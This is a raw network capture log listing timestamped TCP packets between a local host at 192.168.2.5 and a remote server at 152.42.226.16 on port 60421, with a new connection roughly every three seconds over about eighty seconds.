Dec 26, 2024 19:30:11.029423952 CET  50005  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:11.148920059 CET  60421  50005  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:11.149980068 CET  50005  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:11.149980068 CET  50005  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:11.269985914 CET  60421  50005  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:13.817203045 CET  60421  50005  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:13.817297935 CET  50005  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:13.817429066 CET  50005  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:13.834583044 CET  50011  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:13.936955929 CET  60421  50005  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:13.954209089 CET  60421  50011  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:13.954302073 CET  50011  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:13.954747915 CET  50011  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:14.074266911 CET  60421  50011  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:16.613300085 CET  60421  50011  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:16.613596916 CET  50011  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:16.613817930 CET  50011  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:16.699413061 CET  50018  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:16.738692999 CET  60421  50011  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:16.819000006 CET  60421  50018  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:16.819504023 CET  50018  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:16.820271015 CET  50018  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:16.939987898 CET  60421  50018  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:16.943677902 CET  50018  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:16.967649937 CET  50019  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:17.087395906 CET  60421  50019  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:17.087538004 CET  50019  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:17.091437101 CET  50019  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:17.211369038 CET  60421  50019  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:19.803093910 CET  60421  50019  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:19.803150892 CET  50019  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:19.803344965 CET  50019  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:19.828159094 CET  50025  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:19.922771931 CET  60421  50019  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:19.947804928 CET  60421  50025  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:19.947911024 CET  50025  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:19.950566053 CET  50025  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:20.071218014 CET  60421  50025  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:22.597563982 CET  60421  50025  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:22.599615097 CET  50025  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:22.599615097 CET  50025  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:22.681669950 CET  50034  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:22.720448971 CET  60421  50025  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:22.801686049 CET  60421  50034  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:22.801940918 CET  50034  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:22.802051067 CET  50034  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:22.922291994 CET  60421  50034  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:22.923517942 CET  50034  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:22.956459999 CET  50035  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:23.076014042 CET  60421  50035  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:23.081526041 CET  50035  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:23.084423065 CET  50035  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:23.204081059 CET  60421  50035  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:25.828970909 CET  60421  50035  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:25.829057932 CET  50035  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:25.829200029 CET  50035  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:25.845716000 CET  50042  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:26.124006033 CET  60421  50035  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:26.124366045 CET  60421  50042  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:26.124440908 CET  50042  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:26.132121086 CET  50042  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:26.251674891 CET  60421  50042  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:28.784693956 CET  60421  50042  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:28.784868002 CET  50042  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:28.785006046 CET  50042  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:28.785722971 CET  50048  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:28.904833078 CET  60421  50042  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:28.905550957 CET  60421  50048  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:28.905694962 CET  50048  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:28.906076908 CET  50048  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:29.044656038 CET  50049  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:29.224884033 CET  60421  50049  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:29.224955082 CET  60421  50048  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:29.225121021 CET  50049  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:29.225121021 CET  50048  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:29.226773024 CET  50049  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:29.346472979 CET  60421  50049  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:31.881264925 CET  60421  50049  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:31.881326914 CET  50049  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:31.881436110 CET  50049  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:31.882332087 CET  50052  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:32.000874043 CET  60421  50049  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:32.001799107 CET  60421  50052  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:32.001902103 CET  50052  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:32.002615929 CET  50052  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:32.123079062 CET  60421  50052  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:34.660274982 CET  60421  50052  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:34.661669970 CET  50052  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:34.661669970 CET  50052  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:34.665445089 CET  50053  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:34.788024902 CET  60421  50052  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:34.791635036 CET  60421  50053  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:34.795840979 CET  50053  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:34.795840979 CET  50053  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:34.918905973 CET  60421  50053  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:34.919421911 CET  50053  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:34.951684952 CET  50054  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:35.073028088 CET  60421  50054  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:35.073256969 CET  50054  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:35.073930025 CET  50054  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:35.193660975 CET  60421  50054  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:37.723402977 CET  60421  50054  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:37.723474026 CET  50054  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:37.723629951 CET  50054  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:37.724576950 CET  50055  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:37.843333960 CET  60421  50054  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:37.844048977 CET  60421  50055  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:37.844130039 CET  50055  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:37.844918013 CET  50055  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:37.964942932 CET  60421  50055  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:40.520375967 CET  60421  50055  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:40.520440102 CET  50055  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:40.520524025 CET  50055  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:40.521418095 CET  50056  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:40.640268087 CET  60421  50055  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:40.641180038 CET  60421  50056  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:40.641415119 CET  50056  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:40.641500950 CET  50056  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:40.761616945 CET  60421  50056  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:40.765563965 CET  50056  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:40.797477007 CET  50057  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:40.917380095 CET  60421  50057  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:40.918184996 CET  50057  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:40.918184996 CET  50057  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:41.038047075 CET  60421  50057  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:43.582778931 CET  60421  50057  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:43.582931995 CET  50057  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:43.582973003 CET  50057  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:43.585458040 CET  50058  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:43.702748060 CET  60421  50057  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:43.705249071 CET  60421  50058  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:43.705353022 CET  50058  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:43.705996990 CET  50058  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:43.825819016 CET  60421  50058  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:46.408020020 CET  60421  50058  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:46.408102036 CET  50058  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:46.408188105 CET  50058  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:46.408704042 CET  50059  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:46.528908968 CET  60421  50058  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:46.529304981 CET  60421  50059  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:46.529412985 CET  50059  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:46.529712915 CET  50059  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:46.650232077 CET  60421  50059  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:46.654006004 CET  50060  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:46.654010057 CET  50059  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:46.773933887 CET  60421  50060  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:46.776372910 CET  50060  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:46.776372910 CET  50060  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:46.899033070 CET  60421  50060  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:49.457849026 CET  60421  50060  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:49.464020014 CET  50060  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:49.501461983 CET  50060  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:49.502177000 CET  50061  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:49.621234894 CET  60421  50060  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:49.622030973 CET  60421  50061  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:49.622114897 CET  50061  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:49.747437000 CET  50061  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:49.867033005 CET  60421  50061  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:52.300656080 CET  60421  50061  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:52.300741911 CET  50061  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:52.308840990 CET  50061  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:52.309724092 CET  50062  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:52.428397894 CET  60421  50061  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:52.429203987 CET  60421  50062  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:52.429295063 CET  50062  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:52.432590961 CET  50062  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:52.554704905 CET  60421  50062  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:52.557141066 CET  60421  50062  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:52.557188034 CET  50062  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:52.628762960 CET  50063  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:52.748272896 CET  60421  50063  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:52.748410940 CET  50063  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:52.748940945 CET  50063  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:52.868419886 CET  60421  50063  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:55.443598032 CET  60421  50063  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:55.445758104 CET  50063  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:55.445827007 CET  50063  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:55.446336985 CET  50064  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:55.565531015 CET  60421  50063  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:55.565799952 CET  60421  50064  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:55.568552971 CET  50064  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:55.571507931 CET  50064  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:55.691004992 CET  60421  50064  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:58.262999058 CET  60421  50064  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:58.263076067 CET  50064  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:58.263262987 CET  50064  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:58.264172077 CET  50065  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:58.383532047 CET  60421  50064  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:58.384380102 CET  60421  50065  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:58.384478092 CET  50065  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:58.384762049 CET  50065  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:58.498411894 CET  50066  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:58.506336927 CET  60421  50065  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:58.506391048 CET  50065  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:58.622658968 CET  60421  50066  152.42.226.16  192.168.2.5
Dec 26, 2024 19:30:58.623652935 CET  50066  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:58.624104977 CET  50066  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:30:58.747620106 CET  60421  50066  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:01.286268950 CET  60421  50066  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:01.288625002 CET  50066  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:01.288625956 CET  50066  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:01.300154924 CET  50067  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:01.408225060 CET  60421  50066  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:01.420120001 CET  60421  50067  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:01.424407005 CET  50067  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:01.428456068 CET  50067  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:01.549350977 CET  60421  50067  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:04.082334042 CET  60421  50067  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:04.082400084 CET  50067  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:04.082515955 CET  50067  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:04.083331108 CET  50068  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:04.202142000 CET  60421  50067  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:04.202826977 CET  60421  50068  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:04.202898026 CET  50068  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:04.203799009 CET  50068  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:04.323719978 CET  60421  50068  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:04.323807955 CET  50068  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:04.326790094 CET  50069  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:04.446332932 CET  60421  50069  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:04.446402073 CET  50069  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:04.446907043 CET  50069  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:04.566407919 CET  60421  50069  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:07.098767042 CET  60421  50069  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:07.098896027 CET  50069  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:07.099013090 CET  50069  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:07.101505041 CET  50070  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:07.218580008 CET  60421  50069  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:07.221878052 CET  60421  50070  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:07.221977949 CET  50070  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:07.225542068 CET  50070  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:07.351917028 CET  60421  50070  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:09.923690081 CET  60421  50070  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:09.923749924 CET  50070  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:09.923835993 CET  50070  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:09.924503088 CET  50071  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:10.043561935 CET  60421  50070  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:10.044002056 CET  60421  50071  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:10.044069052 CET  50071  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:10.049017906 CET  50071  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:10.168930054 CET  60421  50071  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:10.168984890 CET  50071  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:10.170008898 CET  50072  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:10.696768999 CET  60421  50071  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:10.697154999 CET  60421  50072  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:10.697632074 CET  50071  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:10.697638035 CET  50072  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:10.701499939 CET  50072  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:10.817264080 CET  60421  50071  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:10.821233988 CET  60421  50072  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:13.396343946 CET  60421  50072  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:13.399827957 CET  50072  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:13.399827957 CET  50072  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:13.403810024 CET  50073  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:13.519473076 CET  60421  50072  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:13.523346901 CET  60421  50073  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:13.523565054 CET  50073  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:13.524194956 CET  50073  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:13.643718958 CET  60421  50073  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:16.207871914 CET  60421  50073  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:16.207923889 CET  50073  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:16.208370924 CET  50073  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:16.208956003 CET  50074  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:16.327939034 CET  60421  50073  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:16.328690052 CET  60421  50074  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:16.328762054 CET  50074  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:16.328970909 CET  50074  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:16.448805094 CET  60421  50074  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:16.448853016 CET  50074  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:16.451211929 CET  50075  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:16.570825100 CET  60421  50075  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:16.571012974 CET  50075  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:16.571527958 CET  50075  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:16.691016912 CET  60421  50075  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:19.240617990 CET  60421  50075  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:19.241637945 CET  50075  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:19.241677999 CET  50075  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:19.244692087 CET  50076  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:19.361469984 CET  60421  50075  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:19.364304066 CET  60421  50076  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:19.365695000 CET  50076  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:19.369529009 CET  50076  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:19.489285946 CET  60421  50076  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:22.021003962 CET  60421  50076  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:22.021081924 CET  50076  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:22.021231890 CET  50076  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:22.022416115 CET  50077  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:22.140763998 CET  60421  50076  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:22.141942978 CET  60421  50077  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:22.142014027 CET  50077  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:22.142159939 CET  50077  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:22.262013912 CET  60421  50077  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:22.262067080 CET  50077  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:22.265098095 CET  50078  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:22.385057926 CET  60421  50078  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:22.385143042 CET  50078  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:22.385929108 CET  50078  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:22.505527973 CET  60421  50078  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:25.036911964 CET  60421  50078  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:25.037679911 CET  50078  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:25.037679911 CET  50078  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:25.041539907 CET  50079  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:25.157344103 CET  60421  50078  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:25.161035061 CET  60421  50079  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:25.161636114 CET  50079  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:25.164397955 CET  50079  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:25.284032106 CET  60421  50079  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:27.833534002 CET  60421  50079  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:27.833597898 CET  50079  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:27.833687067 CET  50079  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:27.834366083 CET  50080  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:27.956294060 CET  60421  50079  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:27.956926107 CET  60421  50080  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:27.956986904 CET  50080  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:27.957204103 CET  50080  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:28.076426983 CET  50081  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:28.076906919 CET  60421  50080  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:28.076956034 CET  50080  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:28.199776888 CET  60421  50081  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:28.199873924 CET  50081  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:28.200428009 CET  50081  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:28.321937084 CET  60421  50081  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:30.864404917 CET  60421  50081  152.42.226.16  192.168.2.5
Dec 26, 2024 19:31:30.865629911 CET  50081  60421  192.168.2.5  152.42.226.16
Dec 26, 2024 19:31:30.866902113 CET  50081  60421  192.168.2.5  152.42.226.16
                      Dec 26, 2024 19:31:30.866904974 CET5008260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:30.986505985 CET6042150081152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:30.986524105 CET6042150082152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:30.986685038 CET5008260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:30.989532948 CET5008260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:31.112251997 CET6042150082152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:33.847800016 CET6042150082152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:33.847855091 CET5008260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:33.847929001 CET5008260421192.168.2.5152.42.226.16
